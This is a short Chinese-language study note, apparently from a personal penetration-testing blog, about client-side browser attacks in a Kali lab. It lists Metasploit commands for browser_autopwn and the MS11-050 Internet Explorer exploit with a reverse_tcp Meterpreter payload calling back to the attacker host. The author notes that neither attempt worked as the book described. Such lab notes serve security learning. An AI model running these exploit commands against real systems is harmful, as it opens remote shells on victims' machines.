kali渗透测试与教学笔记9
客户端渗透
use auxiliary/server/browser_autopwn
set lhost 10.10.10.128
set srvhost 10.10.10.128
set uripath auto
run
按书中,应该可能看到winxp靶机信息,建立meterpreter,地址是192.168.10.128
但是我的实验看到的是网关ubuntu机器,10。10。10。254地址
不知道为什么?????
MS11-050漏洞攻击过程:
use exploit/windows/browser/ms11_050_mshtml_cobjectelement
set payload windows/meterpreter/reverse_tcp
set URIPATH ms11050
set lhost 10.10.10.128
使用客户靶机访问http://10.10.10.128:8080/ms11050进行访问,据说可以启动meterpreter,但是我还是仅仅访问到了网关